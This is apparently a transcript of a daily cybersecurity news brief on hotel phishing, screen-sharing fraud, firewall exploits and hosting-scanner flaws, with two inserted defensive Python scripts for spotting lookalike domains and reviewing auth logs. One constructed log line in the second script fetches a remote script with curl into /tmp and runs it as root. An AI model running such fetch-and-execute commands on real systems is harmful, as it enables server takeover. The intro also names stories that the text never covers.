BMC Daily Cyber News

This is today’s cyber news for November 14th, 2025. Today’s brief connects travel scams, AI secrets, and live social engineering with active attacks on the edge of the network. You’ll hear how fake hotel booking sites quietly skim payment cards, why leading AI companies are leaking access keys from forgotten GitHub repos, and how WhatsApp screen-sharing scams let fraudsters drain accounts in real time. We also cover critical flaws in popular firewalls and a new Akira ransomware tactic that can take down entire Nutanix clusters. Together, these stories show how everyday tools can quickly become high-impact attack paths.
Listeners get a fast tour of the top ten threats shaping risk right now, from hotel and SMS fraud to cloud code leaks, perimeter device exploitation, and emerging attacks on virtualized data centers and shared hosting. Leaders will understand where to push for better visibility and stronger vendor assurances, defenders will pick up practical signals to hunt for in logs and telemetry, and builders will hear why safer defaults matter in AI and developer tooling. All in one short daily listen, with every headline also available in written form at DailyCyber.news.

What is BMC Daily Cyber News?

The BMC Daily Cyber News brings you clear, timely updates on threats, breaches, patches, and trends every day. Stay informed in minutes with focused audio built for busy professionals. Learn more and explore at BareMetalCyber.com.

Attackers are quietly draining accounts through simple hotel booking tricks. In a year-long campaign, a Russian-speaking group set up more than four thousand fake hotel and travel websites worldwide. These spoofed sites mirror familiar brands and are linked from phishing emails that mimic real booking confirmations and payment reminders. That means travelers and employees using corporate cards can hand criminals full card numbers, security codes, and contact details without realizing it. For now, the campaign continues, so banks, hotels, and security teams must watch for new domains and suspicious travel charges.
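One way a brand or security team can "watch for new domains" is to score every newly registered or newly observed domain against the brand names it protects. The script below is an added example, not code from the brief or from any vendor: the brand domains, the homoglyph table and the candidate domains are all constructed for illustration, and the suffix handling assumes simple one-label TLDs (a real deployment would use the Public Suffix List). It flags same-label-different-TLD registrations, homoglyph and hyphen variants, near-miss spellings within edit distance 2, and labels that embed a brand name.

```python
"""Score newly observed domains for similarity to protected hotel/travel brands.

Added example, not from the BMC Daily Cyber News brief. All brand names and
candidate domains here are constructed placeholders, not real indicators.
"""
from __future__ import annotations

# Constructed list of legitimate brand domains a hotel chain might protect.
BRAND_DOMAINS = ["examplehotels.com", "stayresorts.com", "bookatrip.com"]

# Characters and digraphs commonly swapped to build lookalike labels.
HOMOGLYPHS = {"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "vv": "w", "rn": "m"}


def normalize_label(label: str) -> str:
    """Fold common homoglyph substitutions so 'b00k' compares like 'book'."""
    label = label.lower()
    for bad, good in HOMOGLYPHS.items():
        label = label.replace(bad, good)
    return label


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance (insert/delete/substitute), O(len(a) * len(b))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def split_domain(domain: str) -> tuple[str, str]:
    """Return (second-level label, suffix). Assumes a one-label suffix such as
    .com; production code should consult the Public Suffix List instead."""
    parts = domain.lower().strip(".").split(".")
    if len(parts) < 2:
        return parts[0], ""
    return parts[-2], parts[-1]


def score_domain(candidate: str, brands: list[str] = BRAND_DOMAINS) -> list[str]:
    """Return the reasons a candidate resembles a protected brand (empty = clean)."""
    reasons: list[str] = []
    c_label, c_tld = split_domain(candidate)
    c_stripped = c_label.replace("-", "")
    c_norm = normalize_label(c_stripped)
    for brand in brands:
        b_label, b_tld = split_domain(brand)
        b_norm = normalize_label(b_label)
        if c_label == b_label and c_tld == b_tld:
            continue  # the brand's own domain, nothing to flag
        if c_norm == b_norm and c_tld != b_tld:
            reasons.append(f"{brand}: same label on different TLD .{c_tld}")
        elif c_norm == b_norm:
            reasons.append(f"{brand}: homoglyph or hyphen variant '{c_label}'")
        elif levenshtein(c_norm, b_norm) <= 2:
            reasons.append(f"{brand}: edit distance {levenshtein(c_norm, b_norm)}")
        elif b_norm in c_norm:
            reasons.append(f"{brand}: brand embedded in label '{c_label}'")
    return reasons


def flag_new_domains(candidates: list[str]) -> dict[str, list[str]]:
    """Map each flagged candidate to its reasons; clean domains are omitted."""
    return {d: r for d in candidates if (r := score_domain(d))}


if __name__ == "__main__":
    # Constructed "newly observed" domains, e.g. from a certificate-transparency feed.
    observed = [
        "examplehotels.com",          # the brand itself
        "examplehotels.net",          # same label, different TLD
        "exarnplehotels.com",         # 'rn' for 'm'
        "examplehotel.com",           # dropped letter
        "examplehotels-booking.com",  # brand embedded with extra words
        "news.example.org",           # unrelated
    ]
    for domain, reasons in flag_new_domains(observed).items():
        print(domain, "->", "; ".join(reasons))
```

Feed it the daily output of a certificate-transparency monitor or a new-registration feed and route anything flagged to the fraud team; the edit-distance threshold and the homoglyph table are the two knobs to tune against your own false-positive rate.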

Fraudsters are quietly draining accounts through simple phone calls. In these scams, callers pretend to be bank or service staff, then walk victims through installing screen-sharing tools on their phones. Once they can see the screen, the attackers watch one-time passcodes arrive and guide victims to approve transfers or new devices. The result is that money moves out of accounts while the victim thinks they are being helped, not robbed. For now, the best defense is tighter education and monitoring, because the tools themselves look like normal support software.

Network edge devices are again under direct fire. United States cyber authorities have warned that a serious bug in WatchGuard Firebox firewalls is being actively exploited against internet-facing systems. The flaw lets remote attackers run code on the device without logging in, giving them full control over traffic and configuration. That matters because a compromised firewall can silently reroute data, open back doors, and hide deeper intrusions from basic monitoring. Right now, patches and firmware updates are available, but many organizations still need to find each device and confirm it is clean.

Federal cyber officials are now pushing agencies to fully clean up serious flaws in widely used Cisco firewall platforms. Investigators found that attackers could still take over edge devices even after earlier patches, because one new exploit chain survives reboots and partial upgrades. In practice this means a compromised firewall can be quietly turned into a listening post that reroutes, filters, or clobbers traffic before it reaches internal networks. This matters because those boxes often guard virtual private network access and remote work, so a silent hijack undermines many other controls at once. Right now agencies are being told to upgrade to fixed releases, hunt for signs of tampering, and pull any unfixable devices out of exposure.

Across the criminal ecosystem, a major law enforcement push has just throttled several popular toolkits. Under the banner of Operation Endgame, investigators in Europe and other regions seized more than one thousand servers and at least twenty domains tied to the Rhadamanthys infostealer, the Venom remote access trojan, and the Elysium botnet. That infrastructure had been helping criminals siphon credentials, run remote control sessions, and rent out infected machines to other crews. The outcome is a temporary but meaningful loss of firepower for many phishing and ransomware operations, which matters because it can slow new compromises while defenders strengthen controls. For now, police are processing recovered victim data, notifying organizations, and watching for copycat services that try to fill the gap.

An incident at the Washington Post has turned a spotlight on enterprise resource planning software risk. Attackers exploited an unknown flaw in Oracle business software and pulled personal and financial data for nearly ten thousand current and former staff, including bank details and salary information. The same zero-day vulnerability has hit dozens of other organizations that relied on the suite for human resources and payroll without realizing it could be pried open from the outside. This is important because it shows how one weakness in a shared back-office platform can expose identities, income data, and payment routes that fuel fraud and extortion. At the moment Oracle has issued patches, investigations continue at affected firms, and victims are being notified while monitoring and access reviews ramp up.

On the hosting side, a bug in the Imunify antivirus scanner has quietly turned a defensive tool into a potential attack path. Researchers showed that crafted files could trick the scanner into running arbitrary commands on Linux servers that host many small and mid-sized company websites. Because this software often runs with high privileges on shared machines, one successful exploit can piggyback on the scanner and give attackers control over every site on that node. That matters for businesses that assume their provider’s “secure hosting” label means these lower-level tools cannot be turned against them. Right now a fixed version is available, but providers need to roll it out everywhere and check logs for unusual commands and new admin accounts on previously exposed servers.
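The "check logs for unusual commands and new admin accounts" step can be scripted for a fleet of shared hosts. The script below is an added example, not code from the brief or from the Imunify project: it reviews constructed syslog-style auth lines for account creation, additions to administrative groups, and commands run as root outside an expected allowlist or out of world-writable staging paths, and it checks a passwd snapshot for extra UID 0 accounts. The log formats mirror the messages shadow-utils and sudo emit, but every line, hostname, account name and address here is constructed for illustration.

```python
"""Post-exposure review of a Linux hosting node: new accounts, admin-group
changes, unusual root commands, and extra UID 0 users.

Added example, not from the BMC Daily Cyber News brief. Sample log lines and
the passwd snapshot are constructed; the allowlists are illustrative defaults.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

ADMIN_GROUPS = {"sudo", "wheel", "admin", "root"}
# Commands routinely run as root on this host; anything else via sudo is reported.
EXPECTED_ROOT_COMMANDS = {"/usr/bin/systemctl", "/usr/sbin/logrotate", "/usr/bin/apt-get"}
# World-writable staging directories that legitimate admin commands rarely execute from.
SUSPICIOUS_PATH_PREFIXES = ("/tmp/", "/dev/shm/", "/var/tmp/")

USERADD_RE = re.compile(r"useradd\[\d+\]: new user: name=(?P<name>[^,]+), UID=(?P<uid>\d+)")
GROUPADD_RE = re.compile(r"(?:usermod|gpasswd)\[\d+\]: add '(?P<name>[^']+)' to group '(?P<group>[^']+)'")
SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+) : .*USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$")

# Constructed auth log excerpt (203.0.113.0/24 is a documentation range).
SAMPLE_AUTH_LOG = [
    "Nov 14 02:13:07 web07 useradd[2211]: new user: name=support, UID=1007, GID=1007, home=/home/support, shell=/bin/bash, from=none",
    "Nov 14 02:13:09 web07 usermod[2215]: add 'support' to group 'sudo'",
    "Nov 14 02:13:20 web07 sudo:  support : TTY=pts/0 ; PWD=/home/support ; USER=root ; COMMAND=/usr/bin/curl -o /tmp/update.sh http://203.0.113.9/update.sh",
    "Nov 14 02:13:25 web07 sudo:  support : TTY=pts/0 ; PWD=/home/support ; USER=root ; COMMAND=/bin/sh /tmp/update.sh",
    "Nov 14 03:00:01 web07 CRON[3001]: (root) CMD (/usr/sbin/logrotate /etc/logrotate.conf)",
    "Nov 14 03:10:44 web07 sudo:  deploy : TTY=pts/1 ; PWD=/srv/app ; USER=root ; COMMAND=/usr/bin/systemctl restart nginx",
]

# Constructed /etc/passwd snapshot from the same host.
SAMPLE_PASSWD = [
    "root:x:0:0:root:/root:/bin/bash",
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin",
    "support:x:1007:1007::/home/support:/bin/bash",
    "toor:x:0:0::/root:/bin/bash",
]


@dataclass
class Finding:
    line_no: int
    kind: str
    detail: str


def review_auth_log(lines: list[str]) -> list[Finding]:
    """Walk auth log lines and return the events an analyst should look at."""
    findings: list[Finding] = []
    for n, line in enumerate(lines, 1):
        m = USERADD_RE.search(line)
        if m:
            findings.append(Finding(n, "new_account", f"{m['name']} (uid {m['uid']})"))
            continue
        m = GROUPADD_RE.search(line)
        if m and m["group"] in ADMIN_GROUPS:
            findings.append(Finding(n, "admin_group_add", f"{m['name']} -> {m['group']}"))
            continue
        m = SUDO_RE.search(line)
        if m and m["target"] == "root":
            cmd = m["cmd"].strip()
            binary = cmd.split()[0]
            off_list = binary not in EXPECTED_ROOT_COMMANDS
            from_staging = any(p in cmd for p in SUSPICIOUS_PATH_PREFIXES)
            if off_list or from_staging:
                findings.append(Finding(n, "unusual_root_command", f"{m['user']}: {cmd}"))
    return findings


def extra_uid0_accounts(passwd_lines: list[str]) -> list[str]:
    """Return account names other than 'root' whose UID is 0."""
    hits = []
    for line in passwd_lines:
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            hits.append(fields[0])
    return hits


if __name__ == "__main__":
    for f in review_auth_log(SAMPLE_AUTH_LOG):
        print(f"line {f.line_no}: {f.kind}: {f.detail}")
    for name in extra_uid0_accounts(SAMPLE_PASSWD):
        print(f"passwd: extra UID 0 account: {name}")
```

On a real node, point it at /var/log/auth.log (or journalctl output for the sudo and useradd units) and /etc/passwd, and extend EXPECTED_ROOT_COMMANDS from a known-good baseline taken before the exposure window; the scanner's own service account is worth adding as a separate watched user, since commands it spawns are exactly what the reported bug would produce.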

That’s the BareMetalCyber Daily Brief for November 14th, 2025. For more, visit BareMetalCyber dot com. You can also subscribe to the newsletter and view the archive of previous headlines at daily cyber dot news. We’re back Monday.